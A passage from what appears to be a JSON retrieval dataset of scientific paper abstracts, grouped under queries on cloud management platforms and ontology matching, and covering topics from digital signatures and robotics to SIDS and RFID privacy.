"text": "Applications of digital signature technology are on the rise because of legal and technological developments, along with strong market demand for secured transactions on the Internet. In order to predict the future demand for digital signature products and online security, it is important to understand the application development trends in digital signature technology. This comparative study across various modes of e-business indicates that the majority of digital signature applications have been developed for the Business-to-Business (B2B) mode of e-business. This study also indicates a slow adoption rate of digital signature products by governments and the potential for their rapid growth in the Business-to-Consumer (B2C) mode of e-business. These developments promise to provide a robust security infrastructure for online businesses, which may promote e-business further in the future.",
"title": ""
},
{
"docid": "e2de274128ec75d25d9353fc7534eeca",
"text": "A central prerequisite to understand the phenomenon of art in psychological terms is to investigate the nature of the underlying perceptual and cognitive processes. Building on a study by Augustin, Leder, Hutzler, and Carbon (2008) the current ERP study examined the neural time course of two central aspects of representational art, one of which is closely related to object- and scene perception, the other of which is art-specific: content and style. We adapted a paradigm that has repeatedly been employed in psycholinguistics and that allows one to examine the neural time course of two processes in terms of when sufficient information is available to allow successful classification. Twenty-two participants viewed pictures that systematically varied in style and content and conducted a combined go/nogo dual choice task. The dependent variables of interest were the Lateralised Readiness Potential (LRP) and the N200 effect. Analyses of both measures support the notion that in the processing of art style follows content, with style-related information being available at around 224 ms or between 40 and 94 ms later than content-related information. The paradigm used here offers a promising approach to further explore the time course of art perception, thus helping to unravel the perceptual and cognitive processes that underlie the phenomenon of art and the fascination it exerts.",
"title": ""
},
{
"docid": "dc5f111bfe7fa27ae7e9a4a5ba897b51",
"text": "We propose AffordanceNet, a new deep learning approach to simultaneously detect multiple objects and their affordances from RGB images. Our AffordanceNet has two branches: an object detection branch to localize and classify the object, and an affordance detection branch to assign each pixel in the object to its most probable affordance label. The proposed framework employs three key components for effectively handling the multiclass problem in the affordance mask: a sequence of deconvolutional layers, a robust resizing strategy, and a multi-task loss function. The experimental results on the public datasets show that our AffordanceNet outperforms recent state-of-the-art methods by a fair margin, while its end-to-end architecture allows the inference at the speed of 150ms per image. This makes our AffordanceNet well suitable for real-time robotic applications. Furthermore, we demonstrate the effectiveness of AffordanceNet in different testing environments and in real robotic applications. The source code is available at https://github.com/nqanh/affordance-net.",
"title": ""
}
] | scidocsrr |
4b4b0c408c230f46882a7e01e72cd029 | Comparison of open-source cloud management platforms: OpenStack and OpenNebula | [
{
"docid": "84cb130679353dbdeff24100409f57fe",
"text": "Cloud computing has become another buzzword after Web 2.0. However, there are dozens of different definitions for cloud computing and there seems to be no consensus on what a cloud is. On the other hand, cloud computing is not a completely new concept; it has intricate connection to the relatively new but thirteen-year established grid computing paradigm, and other relevant technologies such as utility computing, cluster computing, and distributed systems in general. This paper strives to compare and contrast cloud computing with grid computing from various angles and give insights into the essential characteristics of both.",
"title": ""
},
{
"docid": "52348982bb1a9dcea3070d9b556ef987",
"text": "Cloud computing is the development of parallel computing, distributed computing and grid computing. It has been one of the most hot research topics. Now many corporations have involved in the cloud computing related techniques and many cloud computing platforms have been put forward. This is a favorable situation to study and application of cloud computing related techniques. Though interesting, there are also some problems for so many flatforms. For to a novice or user with little knowledge about cloud computing, it is still very hard to make a reasonable choice. What differences are there for different cloud computing platforms and what characteristics and advantages each has? To answer these problems, the characteristics, architectures and applications of several popular cloud computing platforms are analyzed and discussed in detail. From the comparison of these platforms, users can better understand the different cloud platforms and more reasonablely choose what they want.",
"title": ""
}
] | [
{
"docid": "2a4822a0cd5022b0ca6f603b2279933d",
"text": "The products reviews are increasingly used by individuals and organizations for purchase and business decisions. Driven by the desire of profit, spammers produce synthesized reviews to promote some products or demote competitors products. So deceptive opinion spam detection has attracted significant attention from both business and research communities in recent years. Existing approaches mainly focus on traditional discrete features, which are based on linguistic and psychological cues. However, these methods fail to encode the semantic meaning of a document from the discourse perspective, which limits the performance. In this work, we empirically explore a neural network model to learn document-level representation for detecting deceptive opinion spam. First, the model learns sentence representation with convolutional neural network. Then, sentence representations are combined using a gated recurrent neural network, which can model discourse information and yield a document vector. Finally, the document representations are directly used as features to identify deceptive opinion spam. Based on three domains datasets, the results on in-domain and cross-domain experiments show that our proposed method outperforms state-of-the-art methods. © 2017 Elsevier Inc. All rights reserved.",
"title": ""
},
{
"docid": "3bfeb0096c0255aee35001c23acb2057",
"text": "Tensegrity structures, isolated solid rods connected by tensile cables, are of interest in the field of soft robotics due to their flexible and robust nature. This makes them suitable for uneven and unpredictable environments in which traditional robots struggle. The compliant structure also ensures that the robot will not injure humans or delicate equipment in co-robotic applications [1]. A 6-bar tensegrity structure is being used as the basis for a new generation of robotic landers and rovers for space exploration [1]. In addition to a soft tensegrity structure, we are also exploring use of soft sensors as an integral part of the compliant elements. Fig. 1 shows an example of a 6-bar tensegrity structure, with integrated liquid metalembedded hyperelastic strain sensors as the 24 tensile components. For this tensegrity, the strain sensors are primarily composed of a silicone elastomer with embedded microchannels filled with conductive liquid metal (eutectic gallium indium alloy (eGaIn), Sigma-Aldrich) (fig.2). As the sensor is elongated, the resistance of the eGaIn channel will increase due to the decreased microchannel cross-sectional area and the increased microchannel length [2]. The primary functions of this hyperelastic sensor tensegrity are model validation, feedback control, and structure analysis under payload. Feedback from the sensors can be used for experimental validation of existing models of tensegrity structures and dynamics, such as for the NASA Tensegrity Robotics Toolkit [3]. In addition, the readings from the sensors can provide distance changed between the ends of the bars, which can be used as a state estimator for UC Berkeley’s rapidly prototyped tensegrity robot to perform feedback control [1]. Furthermore, this physical model allows us to observe and record the force distribution and structure deformation with different payload conditions. Currently, we are exploring the possibility of integrating shape memory alloys into the hyperelastic sensors, which can provide the benefit of both actuation and sensing in a compact module. Preliminary tests indicate that this combination has the potential to generate enough force and displacement to achieve punctuated rolling motion for the 6-bar tensegrity structure.",
"title": ""
},
{
"docid": "1e5073e73c371f1682d95bb3eedaf7f4",
"text": "Investigation into robot-assisted intervention for children with autism spectrum disorder (ASD) has gained momentum in recent years. Therapists involved in interventions must overcome the communication impairments generally exhibited by children with ASD by adeptly inferring the affective cues of the children to adjust the intervention accordingly. Similarly, a robot must also be able to understand the affective needs of these children-an ability that the current robot-assisted ASD intervention systems lack-to achieve effective interaction that addresses the role of affective states in human-robot interaction and intervention practice. In this paper, we present a physiology-based affect-inference mechanism for robot-assisted intervention where the robot can detect the affective states of a child with ASD as discerned by a therapist and adapt its behaviors accordingly. This paper is the first step toward developing ldquounderstandingrdquo robots for use in future ASD intervention. Experimental results with six children with ASD from a proof-of-concept experiment (i.e., a robot-based basketball game) are presented. The robot learned the individual liking level of each child with regard to the game configuration and selected appropriate behaviors to present the task at his/her preferred liking level. Results show that the robot automatically predicted individual liking level in real time with 81.1% accuracy. This is the first time, to our knowledge, that the affective states of children with ASD have been detected via a physiology-based affect recognition technique in real time. This is also the first time that the impact of affect-sensitive closed-loop interaction between a robot and a child with ASD has been demonstrated experimentally.",
"title": ""
},
{
"docid": "116ae1a8d8d8cb5a776ab665a6fc1c8c",
"text": "A low noise transimpedance amplifier (TIA) is used in radiation detectors to transform the current pulse produced by a photo-sensitive device into an output voltage pulse with a specified amplitude and shape. We consider here the specifications of a PET (positron emission tomography) system. We review the traditional approach, feedback TIA, using an operational amplifier with feedback, and we investigate two alternative circuits: the common-gate TIA, and the regulated cascode TIA. We derive the transimpedance function (the poles of which determine the pulse shaping); we identify the transistor in each circuit that has the dominant noise source, and we obtain closed-form equations for the rms output noise voltage. We find that the common-gate TIA has high noise, but the regulated cascode TIA has the same dominant noise contribution as the feedback TIA, if the same maximum transconductance value is considered. A circuit prototype of a regulated cascode TIA is designed in a 0.35 μm CMOS technology, to validate the theoretical results by simulation and by measurement.",
"title": ""
},
{
"docid": "9d34171c2fcc8e36b2fb907fe63fc08d",
"text": "A novel approach to view-based eye gaze tracking for human computer interface (HCI) is presented. The proposed method combines different techniques to address the problems of head motion, illumination and usability in the framework of low cost applications. Feature detection and tracking algorithms have been designed to obtain an automatic setup and strengthen the robustness to light conditions. An extensive analysis of neural solutions has been performed to deal with the non-linearity associated with gaze mapping under free-head conditions. No specific hardware, such as infrared illumination or high-resolution cameras, is needed, rather a simple commercial webcam working in visible light spectrum suffices. The system is able to classify the gaze direction of the user over a 15-zone graphical interface, with a success rate of 95% and a global accuracy of around 2 degrees , comparable with the vast majority of existing remote gaze trackers.",
"title": ""
},
{
"docid": "00579ac3e9336b60016f931df6ab2c34",
"text": "Often presented as competing products on the market of low cost 3D sensors, the Kinect™ and the Leap Motion™ (LM) can actually be complementary in some scenario. We promote, in this paper, the fusion of data acquired by both LM and Kinect sensors to improve hand tracking performances. The sensor fusion is applied to an existing augmented reality system targeting the treatment of phantom limb pain (PLP) in upper limb amputees. With the Kinect we acquire 3D images of the patient in real-time. These images are post-processed to apply a mirror effect along the sagittal plane of the body, before being displayed back to the patient in 3D, giving him the illusion that he has two arms. The patient uses the virtual reconstructed arm to perform given tasks involving interactions with virtual objects. Thanks to the plasticity of the brain, the restored visual feedback of the missing arm allows, in some cases, to reduce the pain intensity. The Leap Motion brings to the system the ability to perform accurate motion tracking of the hand, including the fingers. By registering the position and orientation of the LM in the frame of reference of the Kinect, we make our system able to accurately detect interactions of the hand and the fingers with virtual objects, which will greatly improve the user experience. We also show that the sensor fusion nicely extends the tracking domain by supplying finger positions even when the Kinect sensor fails to acquire the depth values for the hand.",
"title": ""
},
{
"docid": "9f16e90dc9b166682ac9e2a8b54e611a",
"text": "Lua is a programming language designed as scripting language, which is fast, lightweight, and suitable for embedded applications. Due to its features, Lua is widely used in the development of games and interactive applications for digital TV. However, during the development phase of such applications, some errors may be introduced, such as deadlock, arithmetic overflow, and division by zero. This paper describes a novel verification approach for software written in Lua, using as backend the Efficient SMTBased Context-Bounded Model Checker (ESBMC). Such an approach, called bounded model checking - Lua (BMCLua), consists in translating Lua programs into ANSI-C source code, which is then verified with ESBMC. Experimental results show that the proposed verification methodology is effective and efficient, when verifying safety properties in Lua programs. The performed experiments have shown that BMCLua produces an ANSI-C code that is more efficient for verification, when compared with other existing approaches. To the best of our knowledge, this work is the first that applies bounded model checking to the verification of Lua programs.",
"title": ""
},
{
"docid": "d287a48936f60ac81b1d27f0885b5360",
"text": "In this article, we are interested in implementing mixed-criticality real-time embedded applications on a given heterogeneous distributed architecture. Applications have different criticality levels, captured by their Safety-Integrity Level (SIL), and are scheduled using static-cyclic scheduling. According to certification standards, mixed-criticality tasks can be integrated onto the same architecture only if there is enough spatial and temporal separation among them. We consider that the separation is provided by partitioning, such that applications run in separate partitions, and each partition is allocated several time slots on a processor. Tasks of different SILs can share a partition only if they are all elevated to the highest SIL among them. Such elevation leads to increased development costs, which increase dramatically with each SIL. Tasks of higher SILs can be decomposed into redundant structures of lower SIL tasks. We are interested to determine (i) the mapping of tasks to processors, (ii) the assignment of tasks to partitions, (iii) the decomposition of tasks into redundant lower SIL tasks, (iv) the sequence and size of the partition time slots on each processor, and (v) the schedule tables, such that all the applications are schedulable and the development costs are minimized. We have proposed a Tabu Search-based approach to solve this optimization problem. The proposed algorithm has been evaluated using several synthetic and real-life benchmarks.",
"title": ""
},
{
"docid": "d75ebc4041927b525d8f4937c760518e",
"text": "Most current term frequency normalization approaches for information retrieval involve the use of parameters. The tuning of these parameters has an important impact on the overall performance of the information retrieval system. Indeed, a small variation in the involved parameter(s) could lead to an important variation in the precision/recall values. Most current tuning approaches are dependent on the document collections. As a consequence, the effective parameter value cannot be obtained for a given new collection without extensive training data. In this paper, we propose a novel and robust method for the tuning of term frequency normalization parameter(s), by measuring the normalization effect on the within document frequency of the query terms. As an illustration, we apply our method on Amati \\& Van Rijsbergen's so-called normalization 2. The experiments for the ad-hoc TREC-6,7,8 tasks and TREC-8,9,10 Web tracks show that the new method is independent of the collections and able to provide reliable and good performance.",
"title": ""
},
{
"docid": "cbdbe103bcc85f76f9e6ac09eed8ea4c",
"text": "Using the evidence collection and analysis methodology for Android devices proposed by Martini, Do and Choo (2015), we examined and analyzed seven popular Android cloud-based apps. Firstly, we analyzed each app in order to see what information could be obtained from their private app storage and SD card directories. We collated the information and used it to aid our investigation of each app’s database files and AccountManager data. To complete our understanding of the forensic artefacts stored by apps we analyzed, we performed further analysis on the apps to determine if the user’s authentication credentials could be collected for each app based on the information gained in the initial analysis stages. The contributions of this research include a detailed description of artefacts, which are of general forensic interest, for each app analyzed.",
"title": ""
},
{
"docid": "eebf03df49eb4a99f61d371e059ef43e",
"text": "In theoretical cognitive science, there is a tension between highly structured models whose parameters have a direct psychological interpretation and highly complex, general-purpose models whose parameters and representations are difficult to interpret. The former typically provide more insight into cognition but the latter often perform better. This tension has recently surfaced in the realm of educational data mining, where a deep learning approach to estimating student proficiency, termed deep knowledge tracing or DKT [17], has demonstrated a stunning performance advantage over the mainstay of the field, Bayesian knowledge tracing or BKT [3].",
"title": ""
},
{
"docid": "7263779123a0894f6d7eb996d631f007",
"text": "The sudden infant death syndrome (SIDS) is postulated to result from a failure of homeostatic responses to life-threatening challenges (e.g. asphyxia, hypercapnia) during sleep. The ventral medulla participates in sleep-related homeostatic responses, including chemoreception, arousal, airway reflex control, thermoregulation, respiratory drive, and blood pressure regulation, in part via serotonin and its receptors. The ventral medulla in humans contains the arcuate nucleus, in which we have shown isolated defects in muscarinic and kainate receptor binding in SIDS victims. We also have demonstrated that the arcuate nucleus is anatomically linked to the nucleus raphé obscurus, a medullary region with serotonergic neurons. We tested the hypothesis that serotonergic receptor binding is decreased in both the arcuate nucleus and nucleus raphé obscurus in SIDS victims. Using quantitative autoradiography, 3H-lysergic acid diethylamide (3H-LSD binding) to serotonergic receptors (5-HT1A-D and 5-HT2 subtypes) was measured blinded in 19 brainstem nuclei. Cases were classified as SIDS (n = 52), acute controls (infants who died suddenly and in whom a complete autopsy established a cause of death) (n = 15), or chronic cases with oxygenation disorders (n = 17). Serotonergic binding was significantly lowered in the SIDS victims compared with controls in the arcuate nucleus (SIDS, 6 +/- 1 fmol/mg tissue; acutes, 19 +/- 1; and chronics, 16 +/- 1; p = 0.0001) and n. raphé obscurus (SIDS, 28 +/- 3 fmol/mg tissue; acutes, 66 +/- 6; and chronics, 59 +/- 1; p = 0.0001). Binding, however, was also significantly lower (p < 0.05) in 4 other regions that are integral parts of the medullary raphé/serotonergic system, and/or are derived, like the arcuate nucleus and nucleus raphé obscurus, from the same embryonic anlage (rhombic lip). These data suggest that a larger neuronal network than the arcuate nucleus alone is involved in the pathogenesis of SIDS, that is, a network composed of inter-related serotonergic nuclei of the ventral medulla that are involved in homeostatic mechanisms, and/or are derived from a common embryonic anlage.",
"title": ""
},
{
"docid": "7813dc93e6bcda97768d87e80f8efb2b",
"text": "The inclusion of transaction costs is an essential element of any realistic portfolio optimization. In this paper, we consider an extension of the standard portfolio problem in which transaction costs are incurred to rebalance an investment portfolio. The Markowitz framework of mean-variance efficiency is used with costs modelled as a percentage of the value transacted. Each security in the portfolio is represented by a pair of continuous decision variables corresponding to the amounts bought and sold. In order to properly represent the variance of the resulting portfolio, it is necessary to rescale by the funds available after paying the transaction costs. We show that the resulting fractional quadratic programming problem can be solved as a quadratic programming problem of size comparable to the model without transaction costs. Computational results for two empirical datasets are presented.",
"title": ""
},
{
"docid": "19b16abf5ec7efe971008291f38de4d4",
"text": "Cross-modal retrieval has recently drawn much attention due to the widespread existence of multimodal data. It takes one type of data as the query to retrieve relevant data objects of another type, and generally involves two basic problems: the measure of relevance and coupled feature selection. Most previous methods just focus on solving the first problem. In this paper, we aim to deal with both problems in a novel joint learning framework. To address the first problem, we learn projection matrices to map multimodal data into a common subspace, in which the similarity between different modalities of data can be measured. In the learning procedure, the ℓ2-norm penalties are imposed on the projection matrices separately to solve the second problem, which selects relevant and discriminative features from different feature spaces simultaneously. A multimodal graph regularization term is further imposed on the projected data,which preserves the inter-modality and intra-modality similarity relationships.An iterative algorithm is presented to solve the proposed joint learning problem, along with its convergence analysis. Experimental results on cross-modal retrieval tasks demonstrate that the proposed method outperforms the state-of-the-art subspace approaches.",
"title": ""
},
{
"docid": "f58a66f2caf848341b29094e9d3b0e71",
"text": "Since student performance and pass rates in school reflect teaching level of the school and even all education system, it is critical to improve student pass rates and reduce dropout rates. Decision Tree (DT) algorithm and Support Vector Machine (SVM) algorithm in data mining, have been used by researchers to find important student features and predict the student pass rates, however they did not consider the coefficient of initialization, and whether there is a dependency between student features. Therefore, in this study, we propose a new concept: features dependencies, and use the grid search algorithm to optimize DT and SVM, in order to improve the accuracy of the algorithm. Furthermore, we added 10-fold cross-validation to DT and SVM algorithm. The results show the experiment can achieve better results in this work. The purpose of this study is providing assistance to students who have greater difficulties in their studies, and students who are at risk of graduating through data mining techniques.",
"title": ""
},
{
"docid": "8cfeb661397d6716ca7fa9954de81330",
"text": "There has been a great amount of work on query-independent summarization of documents. However, due to the success of Web search engines query-specific document summarization (query result snippets) has become an important problem, which has received little attention. We present a method to create query-specific summaries by identifying the most query-relevant fragments and combining them using the semantic associations within the document. In particular, we first add structure to the documents in the preprocessing stage and convert them to document graphs. Then, the best summaries are computed by calculating the top spanning trees on the document graphs. We present and experimentally evaluate efficient algorithms that support computing summaries in interactive time. Furthermore, the quality of our summarization method is compared to current approaches using a user survey.",
"title": ""
},
{
"docid": "bc77c4bcc60c3746a791e61951d42c78",
"text": "In this paper, a hybrid of indoor ambient light and thermal energy harvesting scheme that uses only one power management circuit to condition the combined output power harvested from both energy sources is proposed to extend the lifetime of the wireless sensor node. By avoiding the use of individual power management circuits for multiple energy sources, the number of components used in the hybrid energy harvesting (HEH) system is reduced and the system form factor, cost and power losses are thus reduced. An efficient microcontroller-based ultra low power management circuit with fixed voltage reference based maximum power point tracking is implemented with closed-loop voltage feedback control to ensure near maximum power transfer from the two energy sources to its connected electronic load over a wide range of operating conditions. From the experimental test results obtained, an average electrical power of 621 μW is harvested by the optimized HEH system at an average indoor solar irradiance of 1010 lux and a thermal gradient of 10 K, which is almost triple of that can be obtained with conventional single-source thermal energy harvesting method.",
"title": ""
},
{
"docid": "8ae12d8ef6e58cb1ac376eb8c11cd15a",
"text": "This paper surveys recent technical research on the problems of privacy and security for radio frequency identification (RFID). RFID tags are small, wireless devices that help identify objects and people. Thanks to dropping cost, they are likely to proliferate into the billions in the next several years-and eventually into the trillions. RFID tags track objects in supply chains, and are working their way into the pockets, belongings, and even the bodies of consumers. This survey examines approaches proposed by scientists for privacy protection and integrity assurance in RFID systems, and treats the social and technical context of their work. While geared toward the nonspecialist, the survey may also serve as a reference for specialist readers.",
"title": ""
},
{
"docid": "2cff00acdccfc43ed2bc35efe704f1ac",
"text": "A decision to invest in new manufacturing enabling technologies supporting computer integrated manufacturing (CIM) must include non-quantifiable, intangible benefits to the organization in meeting its strategic goals. Therefore, use of tactical level, purely economic, evaluation methods normally result in the rejection of strategically vital automation proposals. This paper includes four different fuzzy multi-attribute group decision-making methods. The first one is a fuzzy model of group decision proposed by Blin. The second is fuzzy synthetic evaluation, the third is Yager’s weighted goals method, and the last one is fuzzy analytic hierarchy process. These methods are extended to select the best computer integrated manufacturing system by taking into account both intangible and tangible factors. A computer software for these approaches is developed and finally some numerical applications of these methods are given to compare the results of all methods. # 2003 Elsevier Science B.V. All rights reserved.",
"title": ""
},
{
"docid": "7f39974c1eb5dcecf2383ec9cd5abc42",
"text": "Edited volumes are an imperfect format for the presentation of ideas, not least because their goals vary. Sometimes they aim simply to survey the field, at other times to synthesize and advance the field. I prefer the former for disciplines that by their nature are not disposed to achieve definitive statements (philosophy, for example). A volume on an empirical topic, however, by my judgment falls short if it closes without firm conclusions, if not on the topic itself, at least on the state of the art of its study. Facial Attractiveness does fall short of this standard, but not for lack of serious effort (especially appreciated are such features as the summary table in Chapter 5). Although by any measure an excellent and thorough review of the major strands of its topic, the volume’s authors are often in such direct conflict that the reader is disappointed that the editors do not, in the end, provide sufficient guidance about where the most productive research avenues lie. Every contribution is persuasive, but as they cannot all be correct, who is to win the day? An obvious place to begin is with the question, What is “attractiveness”? Most writers seem unaware of the problem, and how it might impact their research methodology. What, the reader wants to know, is the most defensible conceptualization of the focal phenomenon? Often an author focuses explicitly on the aesthetic dimension of “attractive,” treating it as a synonym for “beauty.” A recurring phrase in the book is that “beauty is in the eye of the beholder,” with the authors undertaking to argue whether this standard accurately describes social reality. They reach contradictory conclusions. Chapter 1 (by Adam Rubenstein et al.) finds the maxim to be a “myth” which, by chapter’s end, is presumably dispelled; Anthony Little and his co-authors in Chapter 3, however, view their contribution as “help[ing] to place beauty back into the eye of the beholder.” Other chapters take intermediate positions. Besides the aesthetic, “attractive” can refer to raw sexual appeal, or to more long-term relationship evaluations. Which kind of attractiveness one intends will determine the proper methodology to use, and thereby impact the likely experimental results. As only one example, if one intends to investigate aesthetic attraction, the sexual orientation of the judges does not matter, whereas it matters a great deal if one intends to investigate sexual or relationship attraction. Yet no study discussed in these",
"title": ""
}
] | scidocsrr |
0af1206aa41d7c0c33f8e6f873b731a8 | A Comparative Evaluation of String Similarity Metrics for Ontology Alignment | [
{
"docid": "e42439998ac3b64d3f6653b13c75d192",
"text": "After years of research on ontology matching, it is reasonable to consider several questions: is the field of ontology matching still making progress? Is this progress significant enough to pursue further research? If so, what are the particularly promising directions? To answer these questions, we review the state of the art of ontology matching and analyze the results of recent ontology matching evaluations. These results show a measurable improvement in the field, the speed of which is albeit slowing down. We conjecture that significant improvements can be obtained only by addressing important challenges for ontology matching. We present such challenges with insights on how to approach them, thereby aiming to direct research into the most promising tracks and to facilitate the progress of the field.",
"title": ""
},
{
"docid": "d9160f2cc337de729af34562d77a042e",
"text": "Ontologies proliferate with the progress of the Semantic Web. Ontology matching is an important way of establishing interoperability between (Semantic) Web applications that use different but related ontologies. Due to their sizes and monolithic nature, large ontologies regarding real world domains bring a new challenge to the state of the art ontology matching technology. In this paper, we propose a divide-and-conquer approach to matching large ontologies. We develop a structure-based partitioning algorithm, which partitions entities of each ontology into a set of small clusters and constructs blocks by assigning RDF Sentences to those clusters. Then, the blocks from different ontologies are matched based on precalculated anchors, and the block mappings holding high similarities are selected. Finally, two powerful matchers, V-DOC and GMO, are employed to discover alignments in the block mappings. Comprehensive evaluation on both synthetic and real world data sets demonstrates that our approach both solves the scalability problem and achieves good precision and recall with significant reduction of execution time. 2008 Elsevier B.V. All rights reserved.",
"title": ""
}
] | [
{
"docid": "4538c5874872a0081593407d09e4c6fa",
"text": "PatternAttribution is a recent method, introduced in the vision domain, that explains classifications of deep neural networks. We demonstrate that it also generates meaningful interpretations in the language domain.",
"title": ""
},
{
"docid": "bed9b5a75f79d921444feba4400c9846",
"text": "Clustering algorithms have successfully been applied as a digital image segmentation technique in various fields and applications. However, those clustering algorithms are only applicable for specific images such as medical images, microscopic images etc. In this paper, we present a new clustering algorithm called Image segmentation using K-mean clustering for finding tumor in medical application which could be applied on general images and/or specific images (i.e., medical and microscopic images), captured using MRI, CT scan, etc. The algorithm employs the concepts of fuzziness and belongingness to provide a better and more adaptive clustering process as compared to several conventional clustering algorithms.",
"title": ""
},
{
"docid": "2b66dc9e5a089d82fd0d61f5a62eb049",
"text": "Research on mindfulness indicates that it is associated with improved mental health, but the use of multiple different definitions of mindfulness prevents a clear understanding of the construct. In particular, the boundaries between different conceptualizations of mindfulness and emotion regulation are unclear. Furthermore, the mechanisms by which any of these conceptualizations of mindfulness might influence mental health are not well-understood. The two studies presented here addressed these questions using correlational, self-report data from a non-clinical sample of undergraduate students. The first study used a combination of exploratory and confirmatory factor analyses to better understand the factor structure of mindfulness and emotion regulation measures. Results indicated that these measures assess heterogeneous and overlapping constructs, and may be most accurately thought of as measuring four factors: presentcentered attention, acceptance of experience, clarity about one’s internal experience, and the ability to manage negative emotions. A path analysis supported the hypothesis that mindfulness (defined by a two-factor construct including present-centered attention and acceptance of experience) contributed to clarity about one’s experience, which improved the ability to manage negative emotions. The second study developed these findings by exploring the mediating roles of clarity about one’s internal life, the ability to manage negative emotions, non-attachment (or the extent to which one’s happiness is independent of specific outcomes and events), and rumination in the relationship between mindfulness and two aspects of mental health, psychological distress and flourishing mental health. Results confirmed the importance of these mediators in the relationship between mindfulness and mental health.",
"title": ""
},
{
"docid": "5959fac6fabf495a0af372ffb3add86f",
"text": "A versatile, platform independent and easy to use Java suite for large-scale gene expression analysis was developed. Genesis integrates various tools for microarray data analysis such as filters, normalization and visualization tools, distance measures as well as common clustering algorithms including hierarchical clustering, self-organizing maps, k-means, principal component analysis, and support vector machines. The results of the clustering are transparent across all implemented methods and enable the analysis of the outcome of different algorithms and parameters. Additionally, mapping of gene expression data onto chromosomal sequences was implemented to enhance promoter analysis and investigation of transcriptional control mechanisms.",
"title": ""
},
{
"docid": "be115d8bd86e1ef81f8056a2e97a3f01",
"text": "Sepsis remains a major cause of mortality and morbidity in neonates, and, as a consequence, antibiotics are the most frequently prescribed drugs in this vulnerable patient population. Growth and dynamic maturation processes during the first weeks of life result in large inter- and intrasubject variability in the pharmacokinetics (PK) and pharmacodynamics (PD) of antibiotics. In this review we (1) summarize the available population PK data and models for primarily renally eliminated antibiotics, (2) discuss quantitative approaches to account for effects of growth and maturation processes on drug exposure and response, (3) evaluate current dose recommendations, and (4) identify opportunities to further optimize and personalize dosing strategies of these antibiotics in preterm and term neonates. Although population PK models have been developed for several of these drugs, exposure-response relationships of primarily renally eliminated antibiotics in these fragile infants are not well understood, monitoring strategies remain inconsistent, and consensus on optimal, personalized dosing of these drugs in these patients is absent. Tailored PK/PD studies and models are useful to better understand relationships between drug exposures and microbiological or clinical outcomes. Pharmacometric modeling and simulation approaches facilitate quantitative evaluation and optimization of treatment strategies. National and international collaborations and platforms are essential to standardize and harmonize not only studies and models but also monitoring and dosing strategies. Simple bedside decision tools assist clinical pharmacologists and neonatologists in their efforts to fine-tune and personalize the use of primarily renally eliminated antibiotics in term and preterm neonates.",
"title": ""
},
{
"docid": "bb1d208ad8f31e59ecba7eea35dcff8a",
"text": "Over the past two decades, the molecular machinery that underlies autophagic responses has been characterized with ever increasing precision in multiple model organisms. Moreover, it has become clear that autophagy and autophagy-related processes have profound implications for human pathophysiology. However, considerable confusion persists about the use of appropriate terms to indicate specific types of autophagy and some components of the autophagy machinery, which may have detrimental effects on the expansion of the field. Driven by the overt recognition of such a potential obstacle, a panel of leading experts in the field attempts here to define several autophagy-related terms based on specific biochemical features. The ultimate objective of this collaborative exchange is to formulate recommendations that facilitate the dissemination of knowledge within and outside the field of autophagy research.",
"title": ""
},
{
"docid": "afbaa73c13a54ce746751d693595247e",
"text": "Glossary Affective Processes: Processes regulating emotional states and elicitation of emotional reactions. Cognitive Processes: Thinking processes involved in the acquisition, organization and use of information. Motivation: Activation to action. Level of motivation is reflected in choice of courses of action, and in the intensity and persistence of effort. Perceived Self-Efficacy: People's beliefs about their capabilities to produce effects. Self-Regulation: Exercise of influence over one's own motivation, thought processes, emotional states and patterns of behavior. Perceived self-efficacy is defined as people's beliefs about their capabilities to produce designated levels of performance that exercise influence over events that affect their lives. Self-efficacy beliefs determine how people feel, think, motivate themselves and behave. Such beliefs produce these diverse effects through four major processes. They include cognitive, motivational, affective and selection processes. A strong sense of efficacy enhances human accomplishment and personal well-being in many ways. People with high assurance in their capabilities approach difficult tasks as challenges to be mastered rather than as threats to be avoided. Such an efficacious outlook fosters intrinsic interest and deep engrossment in activities. They set themselves challenging goals and maintain strong commitment to them. They heighten and sustain their efforts in the face of failure. They quickly recover their sense of efficacy after failures or setbacks. They attribute failure to insufficient effort or deficient knowledge and skills which are acquirable. They approach threatening situations with assurance that they can exercise control over them. Such an efficacious outlook produces personal accomplishments, reduces stress and lowers vulnerability to depression. 2 In contrast, people who doubt their capabilities shy away from difficult tasks which they view as personal threats. They have low aspirations and weak commitment to the goals they choose to pursue. When faced with difficult tasks, they dwell on their personal deficiencies, on the obstacles they will encounter, and all kinds of adverse outcomes rather than concentrate on how to perform successfully. They slacken their efforts and give up quickly in the face of difficulties. They are slow to recover their sense of efficacy following failure or setbacks. Because they view insufficient performance as deficient aptitude it does not require much failure for them to lose faith in their capabilities. They fall easy victim to stress and depression. Lisa's notes: So here is the crux of the matter: How do we raise children with serious, chronic illnesses to have strong self-efficacy? It can literally be a matter of …",
"title": ""
},
{
"docid": "b3b59ec24d56b7f68a72374a2a53abf3",
"text": "PURPOSE: Optical tracking is a commonly used tool in computer assisted surgery and surgical training; however, many current generation commercially available tracking systems are prohibitively large and expensive for certain applications. We developed an open source optical tracking system using the Intel RealSense SR300 webcam with integrated depth sensor. In this paper, we assess the accuracy of this tracking system. METHODS: The PLUS toolkit was extended to incorporate the ArUco marker detection and tracking library. The depth data obtained from the infrared sensor of the Intel RealSense SR300 was used to improve accuracy. We assessed the accuracy of the system by comparing this tracker to a high accuracy commercial optical tracker. RESULTS: The ArUco based optical tracking algorithm had median errors of 20.0mm and 4.1 degrees in a 200x200x200mm tracking volume. Our algorithm processing the depth data had a positional error of 17.3mm, and an orientation error of 7.1 degrees in the same tracking volume. In the direction perpendicular to the sensor, the optical only tracking had positional errors between 11% and 15%, compared to errors in depth of 1% or less. In tracking one marker relative to another, a fused transform from optical and depth data produced the best result of 1.39% error. CONCLUSION: The webcam based system does not yet have satisfactory accuracy for use in computer assisted surgery or surgical training.",
"title": ""
},
{
"docid": "5f92491cb7da547ba3ea6945832342ac",
"text": "SwitchKV is a new key-value store system design that combines high-performance cache nodes with resourceconstrained backend nodes to provide load balancing in the face of unpredictable workload skew. The cache nodes absorb the hottest queries so that no individual backend node is over-burdened. Compared with previous designs, SwitchKV exploits SDN techniques and deeply optimized switch hardware to enable efficient contentbased routing. Programmable network switches keep track of cached keys and route requests to the appropriate nodes at line speed, based on keys encoded in packet headers. A new hybrid caching strategy keeps cache and switch forwarding rules updated with low overhead and ensures that system load is always well-balanced under rapidly changing workloads. Our evaluation results demonstrate that SwitchKV can achieve up to 5× throughput and 3× latency improvements over traditional system designs.",
"title": ""
},
{
"docid": "f017d6dff147f00fcbb2356e4fd9e06f",
